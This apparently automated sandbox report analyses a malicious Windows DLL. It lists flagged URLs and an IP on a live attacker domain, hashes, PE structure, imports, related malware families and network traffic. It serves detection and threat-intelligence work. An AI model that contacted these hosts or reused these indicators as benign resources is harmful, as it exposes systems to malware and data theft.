https://rammenale.com/for2/regit.tmp6634-1003rundll32.exe, 00000007.00000002.3289414111.0000000007B2A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3289370327.0000000008BE3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.0000000008814000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txtryrundll32.exe, 00000005.00000002.3289519547.0000000008F42000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txtQwrundll32.exe, 00000006.00000002.3289715229.0000000008D34000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txtrwrundll32.exe, 00000006.00000002.3289715229.0000000008CBC000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmpgrundll32.exe, 0000000C.00000002.3286396113.0000000002B1B000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmphrundll32.exe, 00000007.00000002.3289414111.0000000007B42000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txt4nrundll32.exe, 00000006.00000002.3289715229.0000000008CFD000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txt60rundll32.exe, 00000005.00000002.3286428074.000000000317A000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txtentindowsINetCookiesrundll32.exe, 00000006.00000002.3286763260.0000000003208000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txt4rrundll32.exe, 0000000B.00000002.3289283250.0000000008CA1000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmp08rundll32.exe, 0000000C.00000002.3286396113.0000000002AAA000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmpPrundll32.exe, 00000007.00000002.3289414111.0000000007BA5000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txtfwrundll32.exe, 00000006.00000002.3289715229.0000000008CBC000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txtC:rundll32.exe, 00000005.00000002.3286428074.0000000003170000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3286258610.0000000003080000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3286763260.0000000003190000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3286367088.0000000002F90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3286397413.0000000002F40000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3286293078.0000000002EA0000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txt&rundll32.exe, 00000006.00000002.3286763260.0000000003208000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txt%rundll32.exe, 00000005.00000002.3286428074.00000000031E8000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txt4~rundll32.exe, 00000006.00000002.3289715229.0000000008CE5000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmpSrundll32.exe, 0000000C.00000002.3289874951.0000000008814000.00000004.00000020.00020000.00000000.sdmpfalse
    		unknown
    https://rammenale.com/for2/aclog.txtftrundll32.exe, 00000005.00000002.3286428074.00000000031E8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3286397413.0000000002FB3000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/regit.tmpArundll32.exe, 0000000C.00000002.3289874951.000000000882B000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/aclog.txtkrundll32.exe, 00000005.00000002.3289519547.0000000008FA7000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com//9rundll32.exe, 00000006.00000002.3289715229.0000000008CE5000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://rammenale.com/for2/regit.tmp;rundll32.exe, 00000007.00000002.3286915382.000000000284A000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/aclog.txtirundll32.exe, 0000000B.00000002.3289283250.0000000008CE4000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/aclogtxtrundll32.exe, 00000005.00000002.3286153316.0000000003037000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3286159157.0000000002B77000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3286150447.0000000002B37000.00000004.00000010.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/aclog.txtvrundll32.exe, 00000005.00000002.3286428074.00000000031E8000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/regit.tmpGrundll32.exe, 00000008.00000002.3289919472.0000000008C47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337289222.0000000008C46000.00000004.00000020.00020000.00000000.sdmpfalse
      		unknown
      https://rammenale.com/6rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://rammenale.com/for2/aclog.txttrundll32.exe, 00000005.00000002.3289519547.0000000008FA7000.00000004.00000020.00020000.00000000.sdmpfalse
        		unknown
        https://rammenale.com/for2/aclog.txtsrundll32.exe, 00000006.00000002.3286558558.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3287828894.0000000003280000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://rammenale.com/for2/regit.tmp4s5rundll32.exe, 00000008.00000003.2337362841.0000000008C11000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337408753.0000000008C19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3289712371.0000000008C1B000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://rammenale.com/for2/regit.tmp0rundll32.exe, 00000007.00000002.3286915382.000000000284A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3286449420.0000000002E3A000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://rammenale.com/for2/regit.tmpmprundll32.exe, 00000008.00000002.3289919472.0000000008C47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337289222.0000000008C46000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://rammenale.com/for2/regit.tmp4Xrundll32.exe, 0000000C.00000002.3289874951.000000000889F000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://rammenale.com/for2/aclog.txtzrundll32.exe, 00000005.00000002.3289519547.0000000008F70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3289519547.0000000008F85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3286763260.000000000319A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3289715229.0000000008CFD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3289715229.0000000008CE5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3289283250.0000000008CA1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3289283250.0000000008D02000.00000004.00000020.00020000.00000000.sdmpfalse
          		unknown
          https://rammenale.com/for2/aclog.txtentdll8rundll32.exe, 00000006.00000002.3286763260.000000000319A000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/aclog.txtxrundll32.exe, 00000006.00000002.3286763260.0000000003190000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/regit.tmp7rundll32.exe, 00000007.00000002.3289414111.0000000007BA5000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/regit.tmpc4urundll32.exe, 00000007.00000002.3289414111.0000000007B5C000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/regit.tmp4Zfrhrundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/aclog.txt4$rundll32.exe, 00000006.00000002.3289715229.0000000008CE5000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/aclog.txtdTrundll32.exe, 00000005.00000002.3289519547.0000000008F42000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/regit.tmp4rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.000000000889F000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/regit.tmpukrundll32.exe, 0000000C.00000002.3286396113.0000000002B1B000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/aclog.txtentdllrundll32.exe, 0000000B.00000002.3286397413.0000000002F4A000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/regit.tmp6rundll32.exe, 00000007.00000002.3286915382.000000000284A000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          131.153.206.231
          		rammenale.comUnited States
          		19437SS-ASHUStrue

          General Information

          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1500943
          Start date and time:2024-08-29 06:52:07 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 4m 57s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:15
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:QEydjQdRxs.dll
          renamed because original name is a hash value
          Original Sample Name:b62c9168fcde444dbc3be1593e80747929dcf1a49cc6305b49456d68d0c49e71.dll
          Detection:MAL
          Classification:mal88.evad.winDLL@20/0@1/1
          EGA Information:
          • Successful, ratio: 40%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 15
          • Number of non-executed functions: 49
          Cookbook Comments:
          • Found application associated with file extension: .dll

          Warnings

          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Execution Graph export aborted for target rundll32.exe, PID 1992 because there are no executed function
          • Execution Graph export aborted for target rundll32.exe, PID 2148 because there are no executed function
          • Execution Graph export aborted for target rundll32.exe, PID 7104 because there are no executed function
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          00:53:00API Interceptor2x Sleep call for process: rundll32.exe modified
          00:53:03API Interceptor1x Sleep call for process: loaddll32.exe modified

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          131.153.206.231Dll1.dllGet hashmaliciousUnknownBrowse
            Dll1.dllGet hashmaliciousUnknownBrowse

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              rammenale.comDll1.dllGet hashmaliciousUnknownBrowse
              • 131.153.206.231
              Dll1.dllGet hashmaliciousUnknownBrowse
              • 131.153.206.231

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              SS-ASHUSDll1.dllGet hashmaliciousUnknownBrowse
              • 131.153.206.231
              Dll1.dllGet hashmaliciousUnknownBrowse
              • 131.153.206.231
              https://blockchainsolution.netlify.app/Get hashmaliciousUnknownBrowse
              • 131.153.206.100
              http://blockdag-network-rectification.pages.dev/wallet/inputs.html/js/aes.jsGet hashmaliciousUnknownBrowse
              • 131.153.206.103
              [SUSPECTED SPAM] Your Delivery Has Been Delayed Due to an Address Issue.emlGet hashmaliciousUnknownBrowse
              • 131.153.100.38
              Bank Slip.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
              • 131.153.147.106
              Fatura20240617.exeGet hashmaliciousFormBookBrowse
              • 131.153.148.82
              0tkRwEewXq.exeGet hashmaliciousFormBookBrowse
              • 131.153.170.234
              CMgd5ZVG2N.elfGet hashmaliciousUnknownBrowse
              • 209.100.21.94
              CMV610942X6UI.exeGet hashmaliciousFormBookBrowse
              • 131.153.148.82

              JA3 Fingerprints

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousLummaC, VidarBrowse
              • 131.153.206.231
              rSHIPMENT_DOCMSS24071327.exeGet hashmaliciousFormBook, GuLoaderBrowse
              • 131.153.206.231
              file.exeGet hashmaliciousLummaC, VidarBrowse
              • 131.153.206.231
              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
              • 131.153.206.231
              Dll1.dllGet hashmaliciousUnknownBrowse
              • 131.153.206.231
              Dll1.dllGet hashmaliciousUnknownBrowse
              • 131.153.206.231
              file.exeGet hashmaliciousLummaC, VidarBrowse
              • 131.153.206.231
              x64_installer__v4.5.6.msiGet hashmaliciousUnknownBrowse
              • 131.153.206.231
              Ad#U043ebe_Activator.exeGet hashmaliciousLummaCBrowse
              • 131.153.206.231
              file.exeGet hashmaliciousMeduza StealerBrowse
              • 131.153.206.231

              Dropped Files

              No context

              Created / dropped Files

              No created / dropped files found

              Static File Info

              General

              File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Entropy (8bit):6.525256862846471
              TrID:
              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
              • Generic Win/DOS Executable (2004/3) 0.20%
              • DOS Executable Generic (2002/1) 0.20%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:QEydjQdRxs.dll
              File size:155'648 bytes
              MD5:71481f31ac558750937ef27dad2d0025
              SHA1:fa2010a283a723a0d2a68d6bc8b16389b36a3a04
              SHA256:b62c9168fcde444dbc3be1593e80747929dcf1a49cc6305b49456d68d0c49e71
              SHA512:2553ac889e82ba93d84645f8a569ab697129970dfd7c5d65a5807be650d91dc3ae43888c58f96d75e3894b1517b280e33d11a908e00b01d61b79cf7c4793f82f
              SSDEEP:3072:ttFxYcagk6lhWoXc+HFDXy6yw2oZe34eqfyUDEaMl1vb4:ttFGOrhWgcMVXuw2r4Orb4
              TLSH:39E38D06B180C076C6BF1A390934DB765F7EB5305F709D8F67944E7A9F302C1DA26A2A
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\K...*...*...*..SR...*..SR...*..SR...*..SR...*...*..{*.......*.......*..SR...*......>*..u....*..u....*..u....*..u....*..Rich.*.

              File Icon

              Icon Hash:7ae282899bbab082

              Static PE Info

              General

              Entrypoint:0x10004e89
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x10000000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
              Time Stamp:0x65C149B1 [Mon Feb 5 20:48:49 2024 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:6
              OS Version Minor:0
              File Version Major:6
              File Version Minor:0
              Subsystem Version Major:6
              Subsystem Version Minor:0
              Import Hash:5bcfc08c844c0007f9be93f5c47313c6

              Entrypoint Preview

              Instruction
              push ebp
              mov ebp, esp
              cmp dword ptr [ebp+0Ch], 01h
              jne 00007F27887F0897h
              call 00007F27887F0A88h
              push dword ptr [ebp+10h]
              push dword ptr [ebp+0Ch]
              push dword ptr [ebp+08h]
              call 00007F27887F0743h
              add esp, 0Ch
              pop ebp
              retn 000Ch
              retn 0000h
              int3
              push ecx
              lea ecx, dword ptr [esp+08h]
              sub ecx, eax
              and ecx, 0Fh
              add eax, ecx
              sbb ecx, ecx
              or eax, ecx
              pop ecx
              jmp 00007F27887F0F8Fh
              push ecx
              lea ecx, dword ptr [esp+08h]
              sub ecx, eax
              and ecx, 07h
              add eax, ecx
              sbb ecx, ecx
              or eax, ecx
              pop ecx
              jmp 00007F27887F0F79h
              push ebp
              mov ebp, esp
              push 00000000h
              call dword ptr [1001D05Ch]
              push dword ptr [ebp+08h]
              call dword ptr [1001D058h]
              push C0000409h
              call dword ptr [1001D060h]
              push eax
              call dword ptr [1001D030h]
              pop ebp
              ret
              push ebp
              mov ebp, esp
              sub esp, 00000324h
              push 00000017h
              call dword ptr [1001D064h]
              test eax, eax
              je 00007F27887F0897h
              push 00000002h
              pop ecx
              int 29h
              mov dword ptr [10026BA0h], eax
              mov dword ptr [10026B9Ch], ecx
              mov dword ptr [10026B98h], edx
              mov dword ptr [10026B94h], ebx
              mov dword ptr [10026B90h], esi
              mov dword ptr [10026B8Ch], edi
              mov word ptr [10026BB8h], ss
              mov word ptr [10026BACh], cs
              mov word ptr [eax], es

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x249300x50.rdata
              IMAGE_DIRECTORY_ENTRY_IMPORT0x249800x50.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x280000x1b0.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x290000x13d4.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x235e00x40.rdata
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x1b7eb0x1b800b5ebfcec47bdbde0b0862430d977a874False0.5669921875data6.615728746259108IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata0x1d0000x80da0x820019311fbfbd3de480b77edfe21900099eFalse0.4551081730769231data5.28007570851873IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x260000x15180xc00e0fc4326df3ced7a83183b7950ccd3cbFalse0.16276041666666666data2.421179338341947IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x280000x1b00x200c6f9c221f82fb7b111e9efd08d831664False0.501953125data4.488394384042509IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0x290000x13d40x1400761cd4118d957c1fbec2a8aa8f578464False0.7701171875data6.5210110696497425IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountryZLIB Complexity
              RT_MANIFEST0x280600x14eXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminatorsEnglishUnited States0.6407185628742516

              Imports

              DLLImport
              KERNEL32.DLLFreeLibrary, WriteConsoleW, SetEndOfFile, HeapReAlloc, HeapSize, CreateFileW, FlushFileBuffers, GetStringTypeW, SetStdHandle, GetProcessHeap, ExitProcess, ExpandEnvironmentStringsW, TerminateProcess, CloseHandle, GetProcAddress, CreateProcessW, GetModuleHandleW, CopyFileW, GetEnvironmentVariableW, Sleep, LocalFree, GetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, FreeEnvironmentStringsW, RtlUnwind, RaiseException, InterlockedFlushSList, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, DecodePointer, LoadLibraryExW, ReadFile, GetModuleHandleExW, GetModuleFileNameW, SetFilePointerEx, GetConsoleMode, ReadConsoleW, GetStdHandle, GetFileType, HeapFree, HeapAlloc, LCMapStringW, WriteFile, GetConsoleOutputCP, GetFileSizeEx, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW
              ole32.dllCoCreateInstance, CoUninitialize, CoInitialize
              OLEAUT32.dllVariantClear, VariantInit, SysFreeString, SysAllocString

              Exports

              NameOrdinalAddress
              mydllmain10x10001026

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Aug 29, 2024 06:53:01.287623882 CEST49705443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:01.287688971 CEST44349705131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:01.287748098 CEST49705443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:01.300529957 CEST49706443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:01.300546885 CEST44349706131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:01.300597906 CEST49706443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:01.306808949 CEST49707443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:01.306850910 CEST44349707131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:01.306907892 CEST49707443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:01.326004028 CEST49705443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:01.326021910 CEST44349705131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:01.332247972 CEST49707443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:01.332263947 CEST44349707131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:01.339549065 CEST49708443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:01.339565992 CEST44349708131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:01.339631081 CEST49708443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:01.358179092 CEST49706443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:01.358196974 CEST44349706131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:01.358469963 CEST49708443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:01.358483076 CEST44349708131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.262895107 CEST44349705131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.262970924 CEST49705443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.265547991 CEST44349707131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.265621901 CEST49707443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.270101070 CEST44349706131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.270183086 CEST49706443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.276674032 CEST44349708131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.276761055 CEST49708443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.346857071 CEST49706443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.346875906 CEST44349706131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.347229958 CEST44349706131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.347316027 CEST49706443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.349389076 CEST49706443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.364583969 CEST49708443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.364593983 CEST44349708131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.364877939 CEST44349708131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.364928007 CEST49708443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.367221117 CEST49708443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.391892910 CEST49707443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.391912937 CEST44349707131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.392280102 CEST44349707131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.392437935 CEST49707443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.392502069 CEST44349706131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.394804955 CEST49707443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.408499956 CEST44349708131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.417390108 CEST49705443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.417403936 CEST44349705131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.417740107 CEST44349705131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.417814970 CEST49705443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.420435905 CEST49705443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.440490007 CEST44349707131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.460506916 CEST44349705131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.855943918 CEST44349706131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.856120110 CEST44349706131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.856185913 CEST49706443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.856878042 CEST44349705131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.856931925 CEST49705443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.856945992 CEST44349705131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.856987953 CEST49705443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.856992960 CEST44349705131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.857038021 CEST44349705131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.857079983 CEST49705443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.858630896 CEST49706443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.858647108 CEST44349706131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.858690977 CEST49706443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.858710051 CEST49706443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.859559059 CEST44349707131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.859621048 CEST49707443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.859639883 CEST44349707131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.859684944 CEST49707443192.168.2.5131.153.206.231
              Aug 29, 2024 06:53:02.859694004 CEST44349707131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.859711885 CEST44349707131.153.206.231192.168.2.5
              Aug 29, 2024 06:53:02.859739065 CEST49707443192.168.2.5131.153.206.231
